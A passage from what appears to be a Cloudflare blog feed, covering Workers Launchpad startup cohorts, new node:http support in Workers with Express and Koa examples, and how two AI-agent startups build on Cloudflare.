#6</b></p><p>Before introducing Cohort #6, we want to give one last shout out to Cohort #5. As Launchpad alumni, we cannot wait to see what you achieve. If you didn’t get a chance to check out Cohort #5’s demo day, watch the recording <a href="https://cloudflare.tv/shows/workers-launchpad-demo-day/workers-launchpad-demo-day-cohort-5/5Zn2E0ZA"><u>here</u></a>.</p><p>With that, help us give a warm welcome to the participants of Workers Launchpad Cohort #6:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3sGY6SJyT8kdDMLjufix74/091b17ca5e7af9c6513f951ceae9de19/image-2025-12-04-12-15-45-396.png" />
          </figure><p>We’re excited to see what Cohort #6 accomplishes. Follow <a href="https://x.com/Cloudflare?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor"><u>@CloudflareDev</u></a> on X and join our Developer <a href="https://discord.com/invite/cloudflaredev"><u>Discord</u></a> to stay updated on their progress. If you’re a startup interested in joining Workers Launchpad, applications for Cohort #7 are <a href="http://www.cloudflare.com/lp/workers-launchpad"><u>now open</u></a>.</p><table><tr><th><p><b>Company</b></p></th><th><p><b>About</b></p></th></tr><tr><td><p><a href="https://www.allegory.world"><b>Allegory</b></a></p></td><td><p>AI-Powered platform connecting impact to funding</p></td></tr><tr><td><p><a href="https://www.apgio.com"><b>Apgio</b></a></p></td><td><p>Mobile app localization platform with smart AI translations and workflow tooling</p></td></tr><tr><td><p><a href="https://www.atlas.kitchen"><b>Atlas</b></a></p></td><td><p>Building the operating system for restaurants</p></td></tr><tr><td><p><a href="https://www.bloctave.co.uk"><b>Bloctave</b></a></p></td><td><p>Configurable rights management platform with instantaneous royalty distribution</p></td></tr><tr><td><p><a href="https://www.byteable.ai"><b>Byte</b></a></p></td><td><p>AI code auditor that translates codebases into natural language</p></td></tr><tr><td><p><a href="https://www.calljmp.com"><b>Calljmp</b></a></p></td><td><p>Agentic AI backend for apps</p></td></tr><tr><td><p><a href="https://centian.ai/"><b>Centian</b></a></p></td><td><p>MCP-powered AI Agent middleware for successful and compliant operations</p></td></tr><tr><td><p><a href="https://divinci.app/"><b>Divinci AI</b></a></p></td><td><p>Release management and quality assurance for custom LLMs</p></td></tr><tr><td><p><a href="https://www.dxos.org"><b>DXOS</b></a></p></td><td><p>An extensible open-core super-app designed to be your team’s brain</p></td></tr><tr><td><p><a href="https://www.fidsy.com"><b>Fidsy</b></a></p></td><td><p>AI-native, code-free orchestration platform providing automated data privacy for all AI &amp; Data workflows</p></td></tr><tr><td><p><a href="https://www.fluentos.com"><b>Fluentos</b></a></p></td><td><p>Create popups your customers won’t hate</p></td></tr><tr><td><p><a href="https://www.framebird.io"><b>Framebird</b></a></p></td><td><p>Media sharing solution for creatives featuring modern galleries and client review tools</p></td></tr><tr><td><p><a href="https://www.gopersonal.com"><b>GoPersonal</b></a></p></td><td><p>AI to build, personalize, and manage your ecommerce business</p></td></tr><tr><td><p><a href="https://www.horizonexp.com"><b>Horizon</b></a></p></td><td><p>Short-form &amp; agentic experiences for apps and websites</p></td></tr><tr><td><p><a href="https://www.kenobi.ai"><b>Kenobi</b></a></p></td><td><p>Personalizing the Internet with custom web experiences</p></td></tr><tr><td><p><a href="https://www.monetization.dev/"><b>MonetizationOS</b></a></p></td><td><p>Intelligent decisioning at the edge, for monetising the human and machine web</p></td></tr><tr><td><p><a href="http://natively.dev"><b>Natively.dev</b></a></p></td><td><p>Build your dream mobile app using AI, enabling users to take directly to App Stores</p></td></tr><tr><td><p><a href="http://www.outhire.ai"><b>Outhire</b></a></p></td><td><p>AI agent automating phone screens without bias</p></td></tr><tr><td><p><a href="https://outsession.com/"><b>Outsession</b></a></p></td><td><p>Privacy-first AI tools that preserve the therapeutic relationship</p></td></tr><tr><td><p><a href="https://www.phleid.com"><b>Phleid</b></a></p></td><td><p>Direct-to-wallet mobile passes and notifications platform</p></td></tr><tr><td><p><a href="https://www.playsafe.ai"><b>PlaySafe</b></a><b> (By </b><a href="https://www.dogelabsvr.com"><b>Doge Labs</b></a><b>)</b></p></td><td><p>Makes voice-chat communities safer by detecting and blocking harassment in real time</p></td></tr><tr><td><p><a href="https://ploton.dev/"><b>Ploton</b></a></p></td><td><p>Help small business businesses grow by building workflows through natural conversation, not complex tools</p></td></tr><tr><td><p><a href="https://www.projectkarna.com"><b>Project Karna</b></a></p></td><td><p>Multimodal, continuous identity for the post-GenAI enterprise</p></td></tr><tr><td><p><a href="https://www.schematichq.com"><b>Schematic</b></a></p></td><td><p>Simplify monetization for GTM teams, allowing them to control pricing, packaging, and entitlements without code changes</p></td></tr><tr><td><p><a href="https://www.soniclinker.com"><b>SonicLinker</b></a></p></td><td><p>Turn AI-agent visits into revenue</p></td></tr><tr><td><p><a href="https://www.suiteop.com"><b>SuiteOp</b></a></p></td><td><p>All-in-one platform to streamline hospitality operations and guest services</p></td></tr><tr><td><p><a href="https://www.suprsend.com"><b>SuprSend</b></a></p></td><td><p>Multi-channel notification engine for product and platform teams</p></td></tr><tr><td><p><a href="https://www.glacis.io/"><b>GLACIS Technologies</b></a></p></td><td><p>Building AI governance infrastructure for edge-native compliance enforcement.</p></td></tr><tr><td><p><a href="https://www.zephyr-cloud.io"><b>Zephyr Cloud</b></a></p></td><td><p>Fastest way to go from idea to production</p></td></tr><tr><td><p><a href="https://www.0.email"><b>Zero Email</b></a></p></td><td><p>AI native email client that manages your inbox, so you don't have to</p></td></tr></table><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <guid isPermaLink="false">3CCpu7wo3wC3GTzCk5urxU</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Valentina Tejera Hernandez</dc:creator>
        </item>
        <item>
            <title><![CDATA[Bringing Node.js HTTP servers to Cloudflare Workers]]></title>
            <link>https://blog.cloudflare.com/bringing-node-js-http-servers-to-cloudflare-workers/</link>
            <pubDate>Mon, 08 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ We've implemented the node:http client and server APIs in Cloudflare Workers, allowing developers to migrate existing Node.js applications with minimal code changes. ]]></description>
            <content:encoded><![CDATA[ <p>We’re making it easier to run your Node.js applications on <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Cloudflare Workers </u></a>by adding support for the <code>node:http</code> client and server APIs. This significant addition brings familiar Node.js HTTP interfaces to the edge, enabling you to deploy existing Express.js, Koa, and other Node.js applications globally with zero cold starts, automatic scaling, and significantly lower latency for your users — all without rewriting your codebase. Whether you're looking to migrate legacy applications to a modern serverless platform or build new ones using the APIs you already know, you can now leverage Workers' global network while maintaining your existing development patterns and frameworks.</p>
    <div>
      <h2>The Challenge: Node.js-style HTTP in a Serverless Environment</h2>
      <a href="#the-challenge-node-js-style-http-in-a-serverless-environment">
        
      </a>
    </div>
    <p>Cloudflare Workers operate in a unique <a href="https://www.cloudflare.com/learning/serverless/what-is-serverless/"><u>serverless</u></a> environment where direct tcp connection isn't available. Instead, all networking operations are fully managed by specialized services outside the Workers runtime itself — systems like our <a href="https://blog.cloudflare.com/introducing-oxy/"><u>Open Egress Router (OER)</u></a> and <a href="https://github.com/cloudflare/pingora"><u>Pingora</u></a> that handle connection pooling, keeping connections warm, managing egress IPs, and all the complex networking details. This means as a developer, you don't need to worry about TLS negotiation, connection management, or network optimization — it's all handled for you automatically.</p><p>This fully-managed approach is actually why we can't support certain Node.js APIs — these networking decisions are handled at the system level for performance and security. While this makes Workers different from traditional Node.js environments, it also makes them better for serverless computing — you get enterprise-grade networking without the complexity.</p><p>This fundamental difference required us to rethink how HTTP APIs work at the edge while maintaining compatibility with existing Node.js code patterns.</p><p>Our Solution: we've implemented the core `node:http` APIs by building on top of the web-standard technologies that Workers already excel at. Here's how it works:</p>
    <div>
      <h3>HTTP Client APIs</h3>
      <a href="#http-client-apis">
        
      </a>
    </div>
    <p>The <code>node:http</code> client implementation includes the essential APIs you're familiar with:</p><ul><li><p><code>http.get()</code> - For simple GET requests</p></li><li><p><code>http.request()</code> - For full control over HTTP requests</p></li></ul><p>Our implementations of these APIs are built on top of the standard <a href="https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API"><code><u>fetch()</u></code></a> API that Workers use natively, providing excellent performance while maintaining Node.js compatibility.</p>
            <pre><code>import http from 'node:http';

export default {
  async fetch(request) {
    // Use familiar Node.js HTTP client APIs
    const { promise, resolve, reject } = Promise.withResolvers();

    const req = http.get('https://api.example.com/data', (res) =&gt; {
      let data = '';
      res.on('data', chunk =&gt; data += chunk);
      res.on('end', () =&gt; {
        resolve(new Response(data, {
          headers: { 'Content-Type': 'application/json' }
        }));
      });
    });

    req.on('error', reject);

    return promise;
  }
};</code></pre>
            
    <div>
      <h3>What's Supported</h3>
      <a href="#whats-supported">
        
      </a>
    </div>
    <ul><li><p>Standard HTTP methods (GET, POST, PUT, DELETE, etc.)</p></li><li><p>Request and response headers</p></li><li><p>Request and response bodies</p></li><li><p>Streaming responses</p></li><li><p>Basic authentication</p></li></ul>
    <div>
      <h3>Current Limitations</h3>
      <a href="#current-limitations">
        
      </a>
    </div>
    <ul><li><p>The <a href="https://nodejs.org/api/http.html#class-httpagent"><code><u>Agent</u></code></a> API is provided but operates as a no-op.</p></li><li><p><a href="https://nodejs.org/docs/v22.19.0/api/http.html#responseaddtrailersheaders"><u>Trailers</u></a>, <a href="https://nodejs.org/docs/v22.19.0/api/http.html#responsewriteearlyhintshints-callback"><u>early hints</u></a>, and <a href="https://nodejs.org/docs/v22.19.0/api/http.html#event-continue"><u>1xx responses</u></a> are not supported.</p></li><li><p>TLS-specific options are not supported (Workers handle TLS automatically).</p></li></ul>
    <div>
      <h2>HTTP Server APIs</h2>
      <a href="#http-server-apis">
        
      </a>
    </div>
    <p>The server-side implementation is where things get particularly interesting. Since Workers can't create traditional TCP servers listening on specific ports, we've created a bridge system that connects Node.js-style servers to the Workers request handling model.</p><p>When you create an HTTP server and call <code>listen(port)</code>, instead of opening a TCP socket, the server is registered in an internal table within your Worker. This internal table acts as a bridge between http.createServer executions and the incoming fetch requests using the port number as the identifier. 

You then use one of two methods to bridge incoming Worker requests to your Node.js-style server.</p>
    <div>
      <h3>Manual Integration with <code>handleAsNodeRequest</code></h3>
      <a href="#manual-integration-with-handleasnoderequest">
        
      </a>
    </div>
    <p>This approach gives you the flexibility to integrate Node.js HTTP servers with other Worker features, and allows you to have multiple handlers in your default <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/service-bindings/rpc/"><u>entrypoint</u></a> such as <code>fetch</code>, <code>scheduled</code>, <code>queue</code>, etc.</p>
            <pre><code>import { handleAsNodeRequest } from 'cloudflare:node';
import { createServer } from 'node:http';

// Create a traditional Node.js HTTP server
const server = createServer((req, res) =&gt; {
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('Hello from Node.js HTTP server!');
});

// Register the server (doesn't actually bind to port 8080)
server.listen(8080);

// Bridge from Workers fetch handler to Node.js server
export default {
  async fetch(request) {
    // You can add custom logic here before forwarding
    if (request.url.includes('/admin')) {
      return new Response('Admin access', { status: 403 });
    }

    // Forward to the Node.js server
    return handleAsNodeRequest(8080, request);
  },
  async queue(batch, env, ctx) {
    for (const msg of batch.messages) {
      msg.retry();
    }
  },
  async scheduled(controller, env, ctx) {
    ctx.waitUntil(doSomeTaskOnSchedule(controller));
  },
};</code></pre>
            <p>This approach is perfect when you need to:</p><ul><li><p>Integrate with other Workers features like <a href="https://www.cloudflare.com/developer-platform/products/workers-kv/"><u>KV</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a>, or <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a></p></li><li><p>Handle some routes differently while delegating others to the Node.js server</p></li><li><p>Apply custom middleware or request processing</p></li></ul>
    <div>
      <h3>Automatic Integration with <code>httpServerHandler</code></h3>
      <a href="#automatic-integration-with-httpserverhandler">
        
      </a>
    </div>
    <p>For use cases where you want to integrate a Node.js HTTP server without any additional features or complexity, you can use the `httpServerHandler` function. This function automatically handles the integration for you. This solution is ideal for applications that don’t need Workers-specific features.</p>
            <pre><code>import { httpServerHandler } from 'cloudflare:node';
import { createServer } from 'node:http';

// Create your Node.js HTTP server
const server = createServer((req, res) =&gt; {
  if (req.url === '/') {
    res.writeHead(200, { 'Content-Type': 'text/html' });
    res.end('&lt;h1&gt;Welcome to my Node.js app on Workers!&lt;/h1&gt;');
  } else if (req.url === '/api/status') {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    res.end(JSON.stringify({ status: 'ok', timestamp: Date.now() }));
  } else {
    res.writeHead(404, { 'Content-Type': 'text/plain' });
    res.end('Not Found');
  }
});

server.listen(8080);

// Export the server as a Workers handler
export default httpServerHandler({ port: 8080 });
// Or you can simply pass the http.Server instance directly:
// export default httpServerHandler(server);</code></pre>
            
    <div>
      <h2><a href="https://expressjs.com/"><u>Express.js</u></a>, <a href="https://koajs.com/"><u>Koa.js</u></a> and Framework Compatibility</h2>
      <a href="#and-framework-compatibility">
        
      </a>
    </div>
    <p>These HTTP APIs open the door to running popular Node.js frameworks like Express.js on Workers. If any of the middlewares for these frameworks don’t work as expected, please <a href="https://github.com/cloudflare/workerd/issues"><u>open an issue</u></a> to Cloudflare Workers repository.</p>
            <pre><code>import { httpServerHandler } from 'cloudflare:node';
import express from 'express';

const app = express();

app.get('/', (req, res) =&gt; {
  res.json({ message: 'Express.js running on Cloudflare Workers!' });
});

app.get('/api/users/:id', (req, res) =&gt; {
  res.json({
    id: req.params.id,
    name: 'User ' + req.params.id
  });
});

app.listen(3000);
export default httpServerHandler({ port: 3000 });
// Or you can simply pass the http.Server instance directly:
// export default httpServerHandler(app.listen(3000));</code></pre>
            <p>In addition to <a href="https://expressjs.com"><u>Express.js</u></a>, <a href="https://koajs.com/"><u>Koa.js</u></a> is also supported:</p>
            <pre><code>import Koa from 'koa';
import { httpServerHandler } from 'cloudflare:node';

const app = new Koa()

app.use(async ctx =&gt; {
  ctx.body = 'Hello World';
});

app.listen(8080);

export default httpServerHandler({ port: 8080 });</code></pre>
            
    <div>
      <h2>Getting started with serverless <a href="http://node.js"><u>Node.js</u></a> applications</h2>
      <a href="#getting-started-with-serverless-applications">
        
      </a>
    </div>
    <p>The <code>node:http </code>and <code>node:https</code> APIs are available in Workers with Node.js compatibility enabled using the <a href="https://developers.cloudflare.com/workers/configuration/compatibility-dates/#nodejs-compatibility-flag"><code><u>nodejs_compat</u></code></a> compatibility flag with a compatibility date later than 08-15-2025.</p><p>The addition of <code>node:http</code> support brings us closer to our goal of making Cloudflare Workers the best platform for running JavaScript at the edge, whether you're building new applications or migrating existing ones.</p><a href="https://deploy.workers.cloudflare.com/?url=&lt;https://github.com/cloudflare/templates/tree/main/nodejs-http-server-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>Ready to try it out? <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>Enable Node.js compatibility</u></a> in your Worker and start exploring the possibilities of familiar<a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/http/"><u> HTTP APIs at the edge</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Node.js]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Servers]]></category>
            <guid isPermaLink="false">k5sD9WGL8BsJPuqsJj6Fn</guid>
            <dc:creator>Yagiz Nizipli</dc:creator>
            <dc:creator>James M Snell</dc:creator>
        </item>
        <item>
            <title><![CDATA[Startup spotlight: building AI agents and accelerating innovation with Cohort #5]]></title>
            <link>https://blog.cloudflare.com/ai-agents-and-innovation-with-launchpad-cohort5/</link>
            <pubDate>Fri, 11 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Discover how developers are using Cloudflare to scale AI workloads and streamline automation and how participants in Workers Launchpad Cohort #4 have built, and startups participating in Cohort #5 ]]></description>
            <content:encoded><![CDATA[ <p>With quick access to flexible infrastructure and innovative AI tools, startups are able to deploy production-ready applications with speed and efficiency. Cloudflare plays a pivotal role for countless applications, empowering founders and engineering teams to build, scale, and accelerate their innovations with ease — and without the burden of technical overhead. And when applicable, initiatives like our <a href="http://www.cloudflare.com/forstartups"><u>Startup Program</u></a> and <a href="http://www.cloudflare.com/lp/workers-launchpad"><u>Workers Launchpad</u></a> offer the tooling and resources that further fuel these ambitious projects.</p><p>Cloudflare recently announced<b> </b><a href="https://blog.cloudflare.com/build-ai-agents-on-cloudflare/"><b><u>AI agents</u></b></a>, allowing developers to leverage Cloudflare to deploy <a href="https://www.cloudflare.com/learning/ai/what-is-agentic-ai/">agents</a> to complete autonomous tasks. We’re already seeing some great examples of startups leveraging Cloudflare as their platform of choice to invest in building their agent infrastructure. Read on to see how a few up-and-coming startups are building their AI agent platforms, powered by Cloudflare.</p>
    <div>
      <h2>Lamatic AI built a scalable AI agent platform using Workers for Platform</h2>
      <a href="#lamatic-ai-built-a-scalable-ai-agent-platform-using-workers-for-platform">
        
      </a>
    </div>
    <p>Founded in 2023, Lamatic.ai empowers SaaS startups to seamlessly integrate intelligent AI agents into their products. Lamatic.ai simplifies the deployment of AI agents by offering a fully managed lifecycle with scalability and security in mind. SaaS providers have been leveraging Lamatic to <a href="https://www.cloudflare.com/learning/cloud/how-to-replatform-applications/">replatform</a> their AI workflows via a no-code visual builder to reduce technical debt and ship products faster. Designed for high availability, scalability, and low latency, Lamatic’s architecture enables developers to build AI-driven applications that remain performant under heavy load. After acquiring a high amount of users in a short amount of time on Product Hunt, Lamatic identified there was real interest to solve complex problems with AI Agents, and the team knew they needed to build a solution with scalability and performance in mind.</p><p>Cloudflare plays a key role in supporting Lamatic’s growth. Powered by Cloudflare <a href="https://workers.cloudflare.com/"><b><u>Workers</u></b></a><b>, </b>Lamatic ensures requests process closer to end users, minimizing latency while offloading computational strain from centralized servers. In just a few months, Lamatic.ai has efficiently scaled to over three million serverless requests per month, supporting over 1,000 customers — all managed by a lean three-person team. </p><p>Customers design their Agent Flows through a no-code visual builder, which generates an interoperable YAML configuration. Sensitive credentials such as API keys and model access tokens are securely encrypted and stored in Workers KV, ensuring they are only decrypted at runtime for enhanced security. All YAML configurations are then compiled into a Workers-compatible JavaScript bundle. When a project is deployed, Lamatic orchestrates critical components like sync jobs for scheduled data ETL operations and incoming webhooks to handle event-driven workflows via <b>Cloudflare </b><a href="https://developers.cloudflare.com/queues/"><b><u>Queues</u></b></a>. Once deployed, the project is fully operational as a Cloudflare Worker with an exposed API endpoint, allowing customers to integrate AI-powered automation directly into their applications with minimal friction.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3YUQpvrLjYaee5RJq4TRW3/8d2db69af7607b038855a0f4f1e27dc6/1.png" />
          </figure><p>To scale out their platform, Lamatic.ai built their architecture isolating serverless and AI logic on a per-customer basis. Rather than batching requests into a centralized cluster, Lamatic.ai distributes workloads across Cloudflare’s global network, ensuring each customer and endpoint is served by its own Worker executing dedicated logic. This per-customer deployment model — enabled by <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/"><b><u>Workers for Platforms</u></b></a><b> </b>— allows Lamatic.ai to deliver customer-specific serverless functions at scale, and reduces technical overhead as they onboard additional customers. Each customer gets a dedicated Worker whose request and rate limits are enabled based on their level of subscription. </p><p>Beyond request processing, Lamatic uses <b>Cloudflare </b><a href="https://developers.cloudflare.com/kv/"><b><u>Workers KV</u></b></a> as a distributed config store to ensure high availability and security. All values are encrypted at rest with <a href="https://en.wikipedia.org/wiki/Galois/Counter_Mode"><u>AES-256-GCM</u></a> and decrypted only at runtime, keeping operations both secure and low-latency. Tokens and user credentials are encrypted and stored in the database and KV. </p><p>To further enhance performance, Cloudflare <b>Queues</b> plays a key role in orchestrating task completion. Lamatic uses Queues to offload work from Workers requests, and handle tasks such as webhooks and coordinating distributed processes, both essential for maintaining system consistency and reliability at scale. While Workers handle sync requests at point of execution, longer running jobs process via Queues. For example, during a scheduled ETL sync, new data records generated are stored as a message queue on Cloudflare <a href="https://developers.cloudflare.com/pub-sub/"><b><u>Pub/Sub</u></b></a>. A consumer Worker collects these messages and makes an API request to the pod using the Workers Queue. The consumer Worker consumes more messages as each queue is finished processing.</p><p>Another example of where this has been optimal is for managing AI workflows. Many AI workflows involve concurrent requests to multiple data sources, Queues <a href="https://www.cloudflare.com/learning/ai/how-to-build-rag-pipelines/">streamlines data processing and efficiently feeds information</a> into customers’ <a href="https://www.cloudflare.com/learning/ai/retrieval-augmented-generation-rag/"><u>Retrieval Augmented Generation (RAG)</u></a> workflows. This approach smooths out workload spikes, reduces bottlenecks, and ensures that AI agents can reliably aggregate and process data without delays.</p><p>Beyond this, Lamatic.ai offers <b>Workers AI</b> as one of the support inference providers that customers can use across their platform. Customers can choose to run one of the many open source models hosted on Workers AI, depending on their use case (chatbot, image generation, voice, etc.). Together, these layers solve the challenges of scaling AI agents by handling high volumes of data, maintaining low-latency responses, and ensuring robust security. With Cloudflare’s infrastructure as its backbone, Lamatic.ai has built a resilient and high-performing platform that meets the rigorous demands of modern AI applications, making it an ideal choice for startups embedding AI-driven features into their products.</p>
    <div>
      <h2>Skyward AI automates compliance using AI agents with Durable Objects and <code>agents</code></h2>
      <a href="#skyward-ai-automates-compliance-using-ai-agents-with-durable-objects-and-agents">
        
      </a>
    </div>
    <p>Skyward AI is transforming compliance operations by leveraging Cloudflare’s serverless computing capabilities to build AI-driven compliance agents that streamline critical tasks like evidence collection, real-time risk analysis, and policy updates. Compliance teams in fintech, supply chain, and other highly regulated industries use these AI Agents to extract and organize evidence, provide real-time recommendations, and orchestrate policy and procedural updates automatically. By handling document parsing, risk monitoring, and policy enforcement, these AI Agents reduce the risk of human error while allowing compliance professionals to focus on high-value tasks.</p><p>Skyward has built an AI agents platform designed with a serverless-first approach, avoiding the constraints of centralized cloud computing. To achieve this, the company leverages Cloudflare’s Developer Platform to create and maintain a highly responsive and scalable infrastructure. <b>Workers</b> handle incoming requests like chat inputs, compliance checks, or authentication, and route them efficiently across multiple geographies. Skyward initially built their AI agents infrastructure using <a href="https://developers.cloudflare.com/durable-objects/"><b><u>Durable Objects</u></b></a>,<b> </b><a href="https://developers.cloudflare.com/workflows/"><b><u>Workflows</u></b></a> and JavaScript-native RPC for AI coordination, but has recently transitioned to Cloudflare’s <a href="https://blog.cloudflare.com/build-ai-agents-on-cloudflare/"><u>new AI agents framework</u></a>. Given that <code>agents </code>provides a framework for building and orchestrating AI agents, the migration has helped Skyward abstract the need to manage Durable Objects manually, significantly reducing time spent on managing these tools. While this release is fairly recent, the transition has helped simplify the way that agents communicate, but it also preserved the benefits of their original design like data privacy, isolation, and concurrency management. This has also made it easier to provide real-time feedback and responses to their end users.</p><p>Skyward optimizes real-time compliance automation by achieving sub-100 ms response times for AI agent queries. Workloads are structured to minimize unnecessary network round-trips, and a sync-engine approach proactively preloads and pushes data to clients, delivering a highly responsive user experience. To proxy AI inference, Skyward uses <a href="https://developers.cloudflare.com/ai-gateway/"><b><u>AI Gateway</u></b></a> to provide observability into usage, performance, and costs across multiple vendors, improving their AI operational efficiency. Leveraging Cloudflare’s serverless Developer Platform has allowed Skyward to simplify their architecture while supporting global availability, avoiding the need for Kubernetes clusters or complex locking mechanisms. The team also avoids the burden of managing regional deployments, as Cloudflare’s multi-region support ensures consistent performance worldwide without added operational complexity.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/IW8Nh4NECUH897s3OEETe/6e3823712b3fceca699c068605aa9092/2.png" />
          </figure><p>State management is a critical component to execute agentic workflows. Each compliance session runs within a dedicated <b>Durable Object</b>, which keeps relevant data close to the execution layer. This setup minimizes database round-trips and ensures that tasks like Anti-Money Laundering (AML) checks, Know Your Business (KYB) validation, and document processing remain efficient. Once a compliance session is complete, the system summarizes and stores the relevant information in Postgres and <b>R2</b>, optimizing memory usage without requiring persistent cloud infrastructure.</p><p>To balance low-latency operations with long-term storage, Skyward employs a multi-layered data management strategy. The Skyward team, using <a href="https://developers.cloudflare.com/hyperdrive/"><b><u>Hyperdrive</u></b></a>, has been able to reduce query latency by nearly 50%, allowing compliance teams to receive immediate feedback. At the company's core, Skyward’s goal is to offer a platform that is "streamlined for compliance teams”. The team maintains that a speedy feedback loop ensures end customers get the data and responses needed to act. Whether there's one agent or hundreds of agents processing tasks in parallel, Hyperdrive ensures that database requests to assets like extensive company documentation (i.e. regulations, policies, procedures, internal documents), complex regulatory knowledge graphs, and on-demand context information for conversational workflows are all as performant as possible.</p><p><b>Durable Objects</b> facilitate real-time session state, ensuring AI agents function smoothly without complex locking mechanisms. For larger compliance-related documents, such as legal PDFs and archived data, Cloudflare <a href="https://developers.cloudflare.com/r2/"><b><u>R2</u></b></a> provides long-term storage, ensuring only frequently accessed information remains readily available. This approach enhances performance while keeping storage management efficient and cost-effective.</p><p>Security and scalability remain priorities for compliance-focused AI applications. Skyward enforces strict access controls, ensuring that only authorized users can access development and production environments. Each AI session maintains an auditable log of key events, user actions, and approvals, supporting the ability to export these insights for compliance and legal requirements. Because each agent is deployed in its own instance and has its own database, Skyward ensures that there is a detailed record of every required user, agent interaction, and auditing requirements. On top of this, the ability to deploy and scale globally with Cloudflare’s network has allowed Skyward to maintain consistent, high-performance operations across multiple regions without extensive infrastructure overhead.</p><p>Looking ahead, Skyward plans to further enhance AI agent responsiveness by running select models directly on <b>Cloudflare Workers AI</b>, reducing reliance on external inference providers. The team plans to further integrate <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/"><b><u>Workers for Platforms</u></b></a> in an effort to better isolate customer data and workflows, giving end users greater control over their compliance automation. As Cloudflare continues to evolve its AI capabilities, Skyward aims to push the boundaries of distributed AI compliance solutions, making regulatory adherence more automated, scalable, and secure.</p>
    <div>
      <h2>Building on Cloudflare</h2>
      <a href="#building-on-cloudflare">
        
      </a>
    </div>
    <p>We’re inspired by how startups like Lamatic AI and Skyward AI are building their AI agent platforms on Cloudflare. This kind of innovation is why we’re proud to see so many startups trust Cloudflare for a scalable, reliable, and efficient foundation. </p><p>We’re also thrilled to share that both Lamatic AI and Skyward AI have been invited to join Cloudflare’s upcoming Workers Launchpad Cohort #5. Speaking of Workers Launchpad, it’s been a few months since our last update — let’s take a look at what’s new.</p>
    <div>
      <h2>Thank you to Workers Launchpad Cohort #4, and a warm welcome to Cohort #5</h2>
      <a href="#thank-you-to-workers-launchpad-cohort-4-and-a-warm-welcome-to-cohort-5">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/52soEAD02j2yywLaDkz7Jv/76bad474948e946fccf845bcda5ed801/3.png" />
          </figure><p>The Workers Launchpad team is blown away by what customers are demonstrating on the Developer Platform. Members of Cohort #4 presented at our bi-annual <a href="https://cloudflare.tv/shows/workers-launchpad-demo-day/workers-launchpad-demo-day-cohort-4/QgLLnBg1"><u>Demo Day</u></a>. We had customers demonstrate what they’re building across a multitude of industries, including (of course) AI / ML, developer tools, 3D design, cloud infrastructure, adtech, media, and beyond. It’s incredibly encouraging to see what all these amazing companies are building on the Cloudflare network, and we look forward to continuing to partner with them throughout their startup journey.</p><p>Following the Demo Day for Workers Launchpad Cohort #4, we’ve seen the largest influx of applications from startups across the globe eager to join Cohort #5. This next wave of founders is pushing the boundaries of what’s possible, building in areas like AI agents, developer tooling, <a href="https://www.cloudflare.com/learning/ai/what-is-model-context-protocol-mcp/">MCP</a>, media, and beyond. With each new cohort, we’re continually inspired by the caliber of founding teams, the bold ideas they bring to life, and the real-world problems they’re tackling with technology.</p><p>Help us give some love and a warm welcome to the participants of Cohort #5:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1RIIq1qTdmBeqeJS7ZoOKh/d65f0cf2c1bb66bdc2f5658b41ad8112/4.png" />
          </figure><p>We can’t wait to share more about what Cohort #5 achieves. Be sure to follow <a href="https://x.com/CloudflareDev"><u>@CloudflareDev</u></a> on X and join our <a href="https://discord.com/invite/cloudflaredev?cf_target_id=4874A68FFE682C2DFA5CB8063B4025ED"><u>Developer Discord</u></a> server to hear updates on the cohorts.</p><p>If you’re developing your application on our Developer Platform, we’d love to learn how Cloudflare is powering your journey. Please <a href="https://docs.google.com/forms/d/e/1FAIpQLSeIZmgY5ste4LZi-hNaJzbXHBbeD2DHWe8R2xxp0wKO0byRYA/viewform"><u>share more</u></a> about what you’re building, and our team will be sure to review your submission. And if you’re a startup and interested in joining Workers Launchpad, feel free to <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>apply for Cohort 6</u></a> — applications are now open!</p><table><tr><td><p><b>Company</b></p></td><td><p><b>About</b></p></td></tr><tr><td><p><a href="https://www.acemate.ai"><b>Acemate</b></a></p></td><td><p>AI learning platform for university students and educators</p></td></tr><tr><td><p><a href="http://www.centillion.ai"><b>Centillion AI</b></a></p></td><td><p>Building an MCP for identity verification &amp; fraud prevention</p></td></tr><tr><td><p><a href="https://dreamlit.ai/"><b>Dreamlit AI</b></a></p></td><td><p>Add transactional notifications into your app in minutes with no engineers required</p></td></tr><tr><td><p><a href="http://www.ductize.com"><b>Ductize</b></a></p></td><td><p>Productize your service and launch your website with integrated payments within 30 minutes</p></td></tr><tr><td><p><a href="http://www.firmly.ai"><b>Firmly</b></a></p></td><td><p>Agentic commerce platform that enables consumers to shop at the moment of inspiration</p></td></tr><tr><td><p><a 